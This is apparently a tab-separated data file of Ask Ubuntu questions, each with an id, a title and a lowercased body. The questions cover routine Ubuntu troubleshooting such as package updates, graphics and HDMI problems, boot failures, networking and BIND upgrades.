//security.ubuntu.com/ubuntu/dists/saucy-security/release.gpg no es pot connectar amb security.ubuntu.com : http : [ ip : 2001:67c:1562 : :15 80 ] w : alguns índex no s'han pogut baixar . s'han descartat , o en el seu lloc s'han emprat els antics . jsudo apt-get dist-upgrade s'està llegint la llista de paquets… fet s'està construint l'arbre de dependències s'està llegint la informació de l'estat… fet s'està calculant l'actualització… fet 0 actualitzats , 0 nous a instaŀlar , 0 a suprimir i 0 no actualitzats . and this is the list of repositories : cat /etc/apt/sources.list # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //es.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //es.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //es.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy universe deb http : //es.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //es.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //es.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //es.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //es.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb-src http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main
402455	i 'm new to ubuntu and just installed 13.10 , and my fan is making continous noise ( sony vpce series )	i 'm so grateful if someone help me to solve .
402457	“user.mime_type” in desktop environment	context guidelines for extended attributes ( freedesktop ) says : user.mime_type : sets the mime type of a file explicitly . this attribute is documented by the `` shared mime-info database specification '' . then later it says support of this extended attribute is optional . as far as i 've tested , this attribute seems to be neither used by the xdg-mime command nor by the nautilus files explorer . question is there an option to make either xdg-mime or nautilus ( i guess nautilus relies on xdg-mime , so mostly the former ) uses the user.mime_type extended attribute ? if not , is this planned for the future ?
402458	how do i install dmcrypt on lubuntu 13.10 ?	how do i install and encrypt my entire disk with dmcrypt ? i am running lubuntu 13.10 . i do n't think i used lvm .
402465	grub network boot , root files for kernel ?	i have made a folder structure for network boot using pxe and grub with the command grub-mknetdir . i have put those files in a valid served tftp folder on server machine . i have put a valid kernel and initrd into that folder too . client machine goes throught usual pxe configuration ( dhcp and so on ) and loads grub . if i use grub command line to load the kernel and the initrd images , what filesystem is used ? where must be dev , etc , bin , etc ? how can i tell the kernel what partition must use ? why grub command 'ls ' can not list any device ? can anyone explain me all of this more detailed ? i have just no idea and have been searching the internet all night long ... thanks in advance guys !
402467	gaming from windows to ubuntu	i have thought of building a second pc for running windows at the same time as ubuntu for may gaming , i have upgraded parts on my current pc and have the gpu and ram and the hdd , sdd for the os , and thought i could build a cheap gaming rig for this purpose . i was wondering if someone has done the same using a ethernet cable to connect the 2 computers and stream the audio and video from the windows to ubuntu for gaming , and send the controller , keyboard , mouse , and mic for controlling and gaming . much like what valve is talking about with steam os and in home streaming . windows 7 pro 64 bit - ubuntu 13.10 64bit
402470	in dual monitor mode touch works on second monitor	i use asus vivobook s500 , and when connecting second monitor i had problem with calibration . i entered these commands : xrandr -- output vga1 -- off xinput map-to-output `` virtual core pointer '' lvds1 enabled second monitor from settings -- > displays . no , when i 'm touching monitor mouse appears in second display . what is wrong and how to solve it ? output of xrandr : screen 0 : minimum 320 x 200 , current 3046 x 1050 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1680x1050+1366+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 59.9*+ 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 60.0 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) output of xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=14 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=15 [ slave pointer ( 2 ) ] ⎜ ↳ atmel atmel maxtouch digitizer id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ video bus id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ usb2.0 uvc hd webcam id=9 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ 34 : df:2a:0c : f3:56 ps . xsetwacom -- list not giving any output .
402471	ubuntu will not restart goes to black screen	loaded 12.0.4 it loaded and ran for the first time then on re boot it went to black screen tried suggested solutions wont start . issue i guess is a video problem i have dual geforce 260 cards with driver update 331.82 installed i am new to linux and not really sure what to do is there a specific driver patch etc ? ? ? ? help
402475	british indian ocean territory time problem	i 've been stationed in the british indian ocean territory and i find ubuntu does not seem to have a time zone for this place . anyone can help ? any suggestions ?
402477	updating latop to 13.04 raring / no gui but only terminal is present	today i updated my laptop ( samsung np-z700 with hybrid graphics ) to ubuntu 13.04 raring and following the update i am not able to see any graphical interface . i tried installing ati drivers from https : //help.ubuntu.com/community/binarydriverhowto/ati but no results . only the terminal is available . running fglrxinfo prints : error : unable to open display ( null ) can anyone help ?
402479	grub and installing a secondary ssd	i hope you can help pointing me in the right direction with this . i currently have a dual-boot setup ( i do n't use windows much , but i need it sometimes ) . i want to install an ssd drive in place of the dvd drive - and keep my current hdd . when i proceed with the installation of ubuntu on my new ssd , will grub recognise the operating systems on the hdd ? where will grub be installed ? thanks for reading : )
402481	problem routing between 2 private networks	i 'm having my first foray into setting up ubuntu server 12.04 as a router which connects 2 private networks . on the server there are 2 nics eth0 : static ip 192.168.0.101 255.255.255.128 ( netmask ) 192.168.0.1 ( gateway to another server ) eth11 : static ip running dhcp server , no dns 192.168.0.129 255.255.255.128 ( netmask ) ip-forward is enabled . the issue i am having is that i can not for the life of me get private n/w on eth1 to access the world without using nat and masquerading - the linux server is connecting 2 private networks . i have these iptables entries on the forward chain sudo iptables -a forward -o eth0 -i eth1 -m conntrack -- ctstate new -j accept sudo iptables -a forward -m conntrack -- ctstate established , related -j accept but no routing occurs from the 192.168.0.128 network . adding the nat rules , and everything works fine . sudo iptables -t nat -f postrouting sudo iptables -t nat -a postrouting -o eth0 -j masquerade so a client on the 192.168.0.128 network , say 192.168.0.141 can ping both 192.168.0.129 and 192.168.0.101 on the server interfaces eth0 and eth0 but packets are n't routed to 192.168.0.1 . add nat rules and it works great . what am i missing ? thanks for any help !
402500	wine ca n't load module p11-kit-trust.so	i 'm in 13.10 64 bit and i 've installed wine from the official repositories . running wineboot or trying to install any .exe gets me the following message : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory i 've tried the directions from the diferent answers here but there is no /usr/lib/i386-linux-gnu/ folder nor a gnome-keyring-pkcs11.so file in the gnome-keyring : i386 package from the official repositories ( gnome-keyring_3.8.2-0ubuntu3.1_i386 ) . should i be using a different gnome-keyring : i386 package version from the one in the official repositories ?
402502	x11vnc server with xubuntu show black screen in client	i am running xubuntu 13.10 ( monitor attached ) with x11vnc 0.9.13-1.1 run with the following options : x11vnc -gui tray=setpass -rfbport prompt -bg -o % home/.x11vnc.log. % vncdisplay i have also enabled after x11vnc was up and running ... .. shared , forever , ultravnc file transfer , and a password for full permissions ( no password for view only ) i am running ultravnc x64 viewer 1.0.9.6.2 from my windows 7 machine and i am able to connect to my xubuntu just fine but what appears on the screen is a black desktop with nothing on it ( no icons , no panels , etc ... ) . what is strange is that the following 2 things are true when i 'm in this state using ultravnc viewer when looking at the xubuntu machine 's monitor i can see the mouse moving when i move it within ultravnc . i can even drag the open windows on my xubuntu desktop around . when i do this the outline of the window i 'm dragging appears in ultravnc ... but only while dragging . if i click on the `` select single window '' toolbar button in ultravnc then click on any open window or anywhere on the desktop that window then shows up in ultravnc and i can interact with it how you would expect . clicking on the desktop shows me the desktop , but then if i try and open any application ( or any other window ) it does not show up in ultravnc ( as expected since i 'm in single window mode ) but it does show up on the xubuntu desktop ( again as expected ) . if i then click on `` select full desktop '' it goes back to the black screen with the same behavior as before . i searched this forum and also google but did not find anything that was helpful at all . hopefully someone can offer some guidance as this has me stumped ! i 've tried using tightvncserver with the live cd , but i have found that it will sometimes open apps in display :0 if a monitor is connected to display :0 and the vnc viewer is connected to display :1 . also , i would rather have a shared view of display :0 and i know the x11vnc server provides this `` out of the box '' . oh and i just tried this from my ubuntu 12.04 machine using `` remote desktop viewer '' and the behavior is exactly the same . so it does n't appear to be an issue with the vnc client . update : so it turns out this seems to be related to the color bit depth set for the vnc server . if i change the bit depth to be anything less than 32 i get full view/control of the desktop . however this has the annoying effect of missing icons in the file manager , desktop , dock , etc ... i assume this is because the icons are 32bit color and there are n't any icons of a lesser bit depth for that application/folder/file . in the file manager , this results in every folder icon being missing and a lot of the icons in the settings manager as well . i also have noticed a ton of errors in the vnc log file after xfce starts . oh and this was after switching to vnc4server . apparently this is a known bug in xubuntu . never found a solution for x11vnc but what i ended up going with is vnc4server and using lxde as the desktop environment in the vnc session . sadly , i have n't found a way to make vnc4server share display :0 with the physical monitor . however , at least i now have a working vnc desktop since this machine will ultimately be headless in a server room .
402503	additional drivers wo n't work	when i open additional drivers it shows a list of propietary drivers but it wo n't let me change them . i click apply changes and it simply goes back to nouveau . i do n't mind nouveau but it causes graphical glitches in my steam games . steam also wo n't detect drivers . i would like to install nividia driver 331 but the change instantly reverts . is there a way i can install it manually with apt-get ? my gfx card is geforce gt 240
402507	where can i download a canon mp640 pixma driver for linux	i have a canon mp640 and have lost the driver disc i need a way to download the driver for it . i have found the driver for window and mac but nothing for linux or ubuntu . i have googled everything i could think of . looked on the canon website they only provide drivers for windows and mac .
402511	ubuntu liveusb boot with or without install results in black screen on i3 core notebook w/ intel hd3000 graphics	i have a hp pavilion g4-1363la notebook pc with the i3 core cpu and intel hd3000 graphics . i had windows 8 on it , but i guess it got corrupted somehow or something , it would n't start up anymore . my uncle , who somewhat knows a thing or 2 about computers , says that i need a new os , because it was missing or something , so i checked out this ubuntu & saw that u could install it to a laptop via usb flash drive , i have done everything i need ( at least i think i have ) , every time i turn on my laptop , it shows me the ubuntu install menu . the options that i have are : '' try ubuntu without installing '' '' install ubuntu '' '' check for disc for defects '' '' test memory '' '' boot from first hard disk '' the first 3 options takes me to a black screen , then the screen sorda turns off . `` test memory '' takes me to a blue screen with a bunch of weird statistics that i have no idea what it is for , then i have options like `` ( esc ) reboot '' - `` ( c ) configuration '' - `` ( sp ) scroll_lock '' - `` ( cr ) scroll_unlock '' . the `` boot from first hard disk '' also takes me to the black screen till the screen turns off , unless i hit enter , it shows me the installing menu again . i really need help installing ubuntu , do i really need to repair my laptop ? ? am i missing something ? or am i doing something wrong ? ?
402512	toshiba satellite p55t-a202 with ubuntu 12.04 lts wo n't connect to internet	i just installed ubuntu 12.04 to my computer ( toshiba satellite p55t-a202 ) and i ca n't connect to the internet . it seems like a common problem but nothing that i have found works . also , i found some solutions using the ethernet cable but i just have wireless . i 'm new at this and also english is not my first language , can someone please help me step by step . $ nmcli d device type state eth0 802-3-ethernet unavailable $ sudo lspci -nnk | grep -i -a5 network 02:00.0 network controller [ 0280 ] : intel corporation device [ 8086:08b1 ] ( rev 63 ) subsystem : intel corporation device [ 8086:4062 ] 03:00.0 ethernet controller [ 0200 ] : atheros communications inc. device [ 1969:10a1 ] ( rev 10 ) subsystem : toshiba america info systems device [ 1179 : fa40 ] kernel driver in use : alx kernel modules : alx $ iwconfig eth0 no wireless extensions . lo no wireless extensions .
402513	ubuntu running very very very very ... very slow	my specs inter core 2 duo ( 2.7 ghz ) 1 gb ddr2 intel graphics swap memory 256 mb its running too slow single text file is not opening up in less than a minute checked system monitor cpu and memory are fine but some time swap is at 100 % but still slowness is all the time windows-7 with so many services installed works quite well but ubuntu freezes too much even when i open 3 tabs in mozilla thinking of increasing swapping size but time taken in opening a file even when swapping is at 4 % i have 64 bit os in my system i know many will say i should have install 32 bit but the issue is i downloaded iso 0f 32 bit intel but then time of install it was not taking that iso file and i had to download 64 bit file and then it got installed now what are the suggestions
402524	not all updates can be installed : partial upgrade	i 'm trying to update my vmware player ubuntu vm to saucy salamander via the software updater app . sadly while it was installing packages vmware player gave this really weird error i 've never seen before . i ca n't remember what it was , but i could either proceed by clicking retry or pass onto vm , or similar options . the pass onto vm option caused the vm to crash completely . upon trying to boot up the vm again , i got this strange error saying i can either take ownership of the vm or cancel the boot . really weird , but the take ownership option said it could damage my vm . i decided to shut down windows 7 instead . upon restarting my pc , i can boot up my vm fine , and while software updater starts up okay , it keeps greying out when it finishes checking for updates . launching software updater from the command line by running $ sudo update-manager reveals these errors are occuring : error loading .desktop file /usr/share/applications/gnomine.desktop : constructor returned null error loading .desktop file /usr/share/app-install/desktop/gnome-mines : gnome-mines.desktop : constructor returned null error loading .desktop file /usr/share/applications/gnome-sudoku.desktop : constructor returned null error loading .desktop file /usr/share/app-install/desktop/gnome-sudoku : gnome-sudoku.desktop : constructor returned null error loading .desktop file /usr/share/applications/mahjongg.desktop : constructor returned null error loading .desktop file /usr/share/app-install/desktop/gnome-control-center-signon : update-accounts.desktop : constructor returned null no idea how to proceed , but this is my third boot now and it 's the same story . ubuntu working perfectly , but software updater/update-manager is completely fried . any advice guys ? ubuntu nooby talking here , but does this mean the problem is superficial ? it 's just something to do with the gui and can be easily fixed ? it 's not like i was attempting anything mental for goodness sake . could this fix the error ? sudo apt-get install -f before i run it , what does the f flag do exactly ? update left it running for about 60 minutes , and it resolved itself ! it says i can only do a partial update though , and that problem can be caused by damaged or unofficial software . is this damage caused by the error before ? full message : not all updates can be installed run a partial upgrade , to install as many updates as possible . this can be caused by : * a previous upgrade which did n't complete * problems with some of the installed software * inofficial software packages not provided by ubuntu * normal changes of a pre-release version of ubuntu partial upgrade close should i be worried ? the update is still in process so i do n't know if i 'll run into the same error again .
402525	how do i import emails from flash drive to thunderbird ?	i am needing to import my emails from my flashdrive that had been saved when i was about to delete windows 7 . i am using ubuntu and thunderbird .
402541	how to remove existing partition that used to be primary installation ?	i had a serious problem with my install earlier this week that went from bad to worse and lead me to just reinstall 13.10 again on the same drive but partitioned in half . so now i have a 240 gb ssd split into about 110gb for each install . i 'm just about done copying all my important files over from the old partition and everything is running smoothly again on the new partition so now i 'm looking to resize the new primary partition back to full size and blow away the entire old one . i 'm not entirely sure how to go about this without making sure that i do n't lose any data and also making sure that the new primary partition remains properly associated with the grub boot loader as currently grub sort of ignores the grub file on the second ( new ) partition and only reads the grub menu from the first partition . any help would be much appreciated . i 'm generally not a noob and am comfortable in the command line , just not when it comes to things that might blow away wrong partitions and mbrs . thanks .
402543	would there be a problem if i set 2 hostnames in my server ?	would there be a problem if i set 2 hostnames in my server ? vi /etc/hostname dns01.hello.com proxy01.hello.com and in my hosts file 127.0.0.1 localhost 127.0.1.1 dns01.hello.com 127.0.1.1 proxy01.hello.com cause i will run a proxy and bind service in this server . kindly advise please .
402553	how can i convert .mp4 files and .srt file to images based on subtitle 's timeline ?	i have .mp4 file and .srt file . i need to convert them to images including subtitle . the problem here is that i only want to capture images that have subtitle . i will use these images to read video lecture by my kindle . anyone who knows which tools can adapt my work please tells me . thanks ; )
402562	lubuntu 13.10 stuck on splash screen ( averatec 3200 laptop )	i 've recently installed lubuntu 13.10 on my averatec 3200 laptop . when i turn on the laptop , it freezes at the splash screen ( after the white dots color blue ) . when i press ctrl+alt+f2 to enter the command line , it briefly asks me to log in , and the screen goes black before i can enter my password . i 'm wondering if anyone knows a fix to this problem ? edit : specs might be helpful . chipset : via km400 processor : amd athlon xp-m memory : 512 mb thank you !
402576	doubt in ubntu installation	when i 'm installing ubuntu 12.04 os i saw the options as follows . install ubuntu along with windows remove everything and make ubuntu as the only os i have installed ubuntu alongwith windows but my doubt is still remains . suppose if i choose 2nd option , then is it remove only the other operating system or is it removes all files in the hard disk alongwith other os ?
402584	moto x wont connect to ubuntu 13.10	i have a nexus 5 which when i connect it via usb works perfectly as far as transferring files goes . but as soon as i plug in the moto x it acts like it does n't exist . reminiscent of an ex-girlfriend of mine . i 've downloaded multiple programs and none of them seem to do anything . ( qlix , gmtp , etc . ) phone is set to mtp and is running android 4.4
402589	`` the following packages were automatically installed and are no longer required : '' what to do ?	after trying to open and install google earth through the terminal it keeps bringing up this message . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 language-pack-kde-en kde-l10n-engb libubuntuoneui-3.0-1 thunderbird-globalmenu language-pack-kde-en-base use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 27 not upgraded . i am wondering what i can do next ?
402593	ubuntu 12.04.3 lts bind upgrade question	i am running ubuntu server 12.04.3 lts with with bind 9.8.1-p1 + to make sure i have the latest updates i ran sudo apt-get update sudo apt-get upgrade sudo dist-upgrade this all worked fine but i noticed that the bind version is still 9.8.1-p1 & since found out that ubuntu 12.04.3 has not released the latest recommend bind version of 9.8.6-p1 or even 9.9.4-p1 to this ubuntu release which is found on : - https : //www.isc.org/downloads/software-support-policy/bind-software-status/ since there are security holes in this bind version 9.8.1-p1 we are unable to pass pci compliance : - dns server recursive query cache poisoning weakness dns ( 53/udp ) cve-1999-0024 medium 5.0 fail solution : upgrade bind to version 9.9.4-p1 dns server cache snooping remote information disclosure dns ( 53/udp ) medium , 5.0 , fail ( the vulnerability is not included in the nvd ) solution : upgrade bind to version 9.9.4-p1 & add the following line to the options section of named.conf : allow-recursion { internaldns ; } ; eg . options { allow-query { internaldns ; } ; allow-recursion { internaldns ; } ; } ; ( this new feature was introduced in bind 9.4 ) ( http : //fixunix.com/dns/496768-dns-cache-snooping.html ) so my question is how do i upgrade to bind version 9.9.4-p1 + also is it safe to run that version on ubuntu 12.04 lts ?
402598	ubuntu server /var/log crazy disk usage	i had small system in my vps , which only had 10gb disk usage . now as i check /var/log directory used 6gb to only write log ! ! ! which it sound very crazy to me . i have tried cleanup the log following this suggestion , but still not much help . is there any reason why the log take so much disk usage ? how to fix it ? i do n't want to have log file that big .
402600	how can i open sublime text 2 with a specified directory in the file viewer panel ?	i know i can launch sublime from the command line with subl , but how do i open it with the current directory i 'm in appearing in the file viewer panel on the left ?
402602	no hdmi sound output geforce 9300 ubuntu 12.04	there seem to be many problems with hdmi output and i have looked around for a couple hours now but can not find one specific to my needs . i have a geforce 9300 graphics card on an amd phenom x4 processor . most linux stuff is new to me but i 'm tired of the other guys and recently installed unbuntu 12.04 which is freaking awesome other than the fact i get no sound through my hdmi output.i have a desktop that connects to my hannspree screen which is where i would like the sound to come out of . is this possible ? my apaly -l does not show the hdmi option . it shows the analog and dialog numbers but that is it . can someone tell me where to go from here ?
402610	declare an array but not define it ?	there are a lot of guides out there which show how to declare and define an array foo [ 0 ] =abc foo [ 1 ] =def what i am trying to achieve is to declare an array but not define it because it does not have to be define immediately , in most programming languages it will look something like this int bar [ 100 ] ; is this possible in shell scripting language ?
402614	problem with starting gui mode in ubuntu server	well i have installed the server version of ubuntu 12.04 . since i was only getting terminal , i installed the desktop package and executed these commands in the following order : sudo apt-get install ubuntu-desktop sudo apt-get update after installing desktop package , though i got a few failure errors but it got installed . i rebooted but still i can not see the gui mode , again landing in terminal . tried to execute startx command but its only showing a white screen with a black background . any insight will be deeply appreciated from this linux beginner .
402624	iris pro 5200 - performance when running on battery	i have a laptop from system 76 ( galago ultrapro ) that runs the iris pro 5200 graphics . when i am running the system while plugged in the performance is great . i can play most games without a problem and everything is smooth as silk . when i run the laptop on battery the cpu ( intel core i7-4750hq ) throttles down to save power and my games will run slow . the game that i am specifically running is europa universalis iv on the native steam client . my question ; is there any way to do one of the following : a ) make the cpu\gpu run on a 'performance ' setting so it does not attempt to throttle . b ) make the laptop think that it is plugged in so that it does not attempt to throttle . i have attempted to use the cpufreq-set utility to set the frequencies to the max but even with those changes the game will still run slow . im thinking that the gpu may be what is throttling and not the cpu . also , this problem is system wide . it is not just effecting the euiv game , i am just using it as a benchmark to test settings . the laptop can be running slow in the game on battery and as soon as i plug it in it runs flawless .
402641	kvm : disabled by bios when trying to upgrade	i 'm attempting to switch from 12.04 ( amd specific ) , to 12.04 ( intel specific ) , and i 'm getting a kvm : disabled by bios message when i boot up . i 'm not sure what to do . i 've searched for this and i ca n't find one that fits my exact situation .
402645	how to assign shortcut key to disable display ?	i have three displays my two main monitors and my hdtv i use for movies and stuff . what i want to do is assign a key or key combination to disable my hdtv when not in use . my graphics card has three outputs ( vga , dvi , hdmi ) i want to disable the hdmi with shortcut key and be able to re-enable it upon the same combination being pressed .
402650	no audio through hdmi with gigabyte brix	newbie to ubuntu ( 13.10 x64 desktop ) and have been trying to get audio to work on a gibabyte brix ( gb-bxi3-4010 ) through hdmi but no go . if i plug into the standard headphone jack audio works no problem . by default ubuntu views hdmi as a possible audio output in the sound settings but will not output . installed alsa mixer and it will show intel haswell as a tab but no output options . missing driver ? aplay -l output : **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc269vc analog [ alc269vc analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 1 : alc269vc digital [ alc269vc digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0
402653	problem with dkpg file	my problem is when i try update the repositives , following message appears in the console : e : no se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open ( 13 : permiso denegado ) e : no se encontró un archivo de réplica «/var/lib/dpkg/» familia2012 @ aldebaran : ~ $ ( english translatrion : ) e : could not open the lock file «/var/lib/dpkg/lock» - open ( 13 : permission denied ) e : no file replication was found «/var/lib/dpkg/» what can i do ?
402655	how to get the lan messenger back	i installed lan messenger in my ubuntu 12.04 pc . it is working well . accidentally i checked the box do n't show system tray icon in the settings . so now i cant bring back its interface . but its working in background . i want the interface back urgently . what should i do to get this back ? in tried these steps 1. reinstalled lan messenger 2. reset the unity 3. checked the system tray white list [ its in the white list but not in tray ]
402664	recording audio from one multi-channel interface vs multiple single-channel interfaces	i 've decided it 's time i started recording some of my music . so i 've bought a couple of samson meteor usb microphones . they 're quite nice and works out of the box . i 'll use one to mic up my guitar amplifier and the other will be used for voice . i 've chosen this way of doing it because it will enable me some more flexibility later , but it also means some added complexity . and since i 'm really quite inexperienced with audio recordings , i could use some advise . to my knowledge , audacity can only record from one audio interface at a time , though it can handle multiple channels from a single audio interface . since i do have some experience using audacity , it would be nice if i could continue to use it somehow . in the back of my mind , i remember seeing that you can create virtual audio interfaces in pulseaudio . would that be a viable solution in this case ? also , should i expect any noticeable differences in performance when using multiple single-channel interfaces rather than one multi-channel interface , such as much added latency ? in general ; are there things i should be aware of , that i 'm not experienced enough to ask about ?
402667	using bootable usb to install ubunu 13.10 : installer not finding current ubuntu 13.04 ?	i have created a bootable usb stick having ubuntu 13.10 . when i boot my laptop , it boots from the usb . i proceed to install ubuntu 13.10 . ahead , i get the below options . you see here the option of 'erase disk & install ubuntu ' . this will delete everything on my laptop . but i was expecting the option of 'erase ubuntu 12.10 & reinstall ' to appear . so , i feel that the installer fails to detect my current ubuntu 12.10 if so , then what to be done so that my o.s is detected . i would appreciate if one can share what options they get when they install from bootable usb ubuntu 13.10 .
402668	trouble finding ubuntu compatable usb wifi adapters	i 've read the forums , i looked at that page that everyone posts on . i do n't mean to sound like a douche but can you guys just seriously help a noob out and recommend a usb wifi device that works in both windows and linux out of the box or atleast has first party ready to install drivers ? please do not post that link i 've seen on previous posts . just a simple `` ya try this one it 's awsome '' would be far less ambiguous and helpful for me . ive tried two adapters now and either of which works . one of them even has `` linux compatible '' on the box yet it does n't even have its own set of drivers for linux . i 'm just really frustrated and would like some recommendations .
402672	installing build application framework	i get this message while installing cruise control : can not construct net.sourceforge.cruisecontrol.build loop information i need help to work this out .
402676	switch from fedora to ubuntu and evolution to thunderbird	presently i have the system with fedora 15 and evolution 3.0.3 for emails . i 'm planning to switch my os to ubuntu and and thunderbird for emails . is there any way i can do this keeping all my earlier email data imported into thunderbird with new os ?
402677	how do i get sequence of functions being called during boot up ?	when i do dmesg at the prompt , i get something like this : [ 0.008660 ] initializing cgroup subsys blkio [ 0.008663 ] initializing cgroup subsys perf_event [ 0.008667 ] initializing cgroup subsys hugetlb [ 0.008713 ] cpu : physical processor id : 0 [ 0.008716 ] cpu : processor core id : 0 [ 0.008720 ] mce : cpu supports 4 mce banks [ 0.008739 ] cpu0 : thermal monitoring enabled ( tm1 ) [ 0.008746 ] process : using mwait in idle threads [ 0.008753 ] last level itlb entries : 4kb 64 , 2mb 64 , 4mb 64 [ 0.008753 ] last level dtlb entries : 4kb 64 , 2mb 0 , 4mb 64 [ 0.008753 ] tlb_flushall_shift : 6 [ 0.008895 ] freeing smp alternatives : 24k freed [ 0.011699 ] acpi : core revision 20121018 [ 0.016015 ] ftrace : allocating 29358 entries in 115 pages [ 0.028544 ] ..timer : vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 [ 0.068468 ] smpboot : cpu0 : intel ( r ) pentium ( r ) 4 cpu 3.00ghz ( fam : 0f , model : 04 , stepping : 09 ) [ 0.072000 ] performance events : netburst events , netburst p4/xeon pmu driver . [ 0.072000 ] ... version : 0 and so on ... question # 1 : i want to know when the o.s starts , what all functions are called in sequence instead of the name of modules being called . so i expect the first thing that should start is main.c in /init folder . how do i get such sequence of functions being called during boot up ?
402680	kvm : disabled my bios message . delete current install then install via usb drive ?	i 'm currently getting the kvm : disabled by bios message and all i want to do is reinstall . would it be possible to delete my current os and use my live usb to install it once more ? i ca n't access my bios to change the virtualization . would my bios be restored to their former glory and let me install or is this just a completely stupid question ?
402681	unable to access dash after uninstalling google chrome	after i removed the package google chrome through command sudo apt-get remove google-chrome-stable . i couldnot access dash . i tried sudo apt-get install unity-scope-home command , but it gives me error about unmet dependencies . after that i tried sudo apt-get -f install , it asked y/n to install libgcc1 package . but it then gives the error : e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : regarding ... /libgcc1_1 % 3a4.8.1-10ubuntu9_i386.deb containing libgcc1 : i386 , pre-dependency problem : libgcc1 pre-depends on multiarch-support multiarch-support is unpacked , but never has been configured . dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.8.1-10ubuntu9_i386.deb ( -- unpack ) : pre-dependency problem - not installing libgcc1 : i386 errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.8.1-10ubuntu9_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
402684	ubuntu black screen appears	i am using ubuntu 12.4 in that we have installed 2gb ram dual core processor i have installed some of the software like eclipse , sql . while using these software 's few seconds screen goes into black and then turning into normal i have even checked memory it is only around 50 % why this is happening like that and their is any solution for this ?
402689	black screen booting ubuntu and from liveusb	i recently dual booted my windows 8 with ubuntu 13.04 64-bit on efi . i followed the standard procedure and did boot-repair in the end . now , when i choose ubuntu option from the grub menu , all i get is a black screen . also , if i now try to reinsert my pen drive ( uefi ) , and try to boot from it , i get a black screen again . what can the possible issue be ?
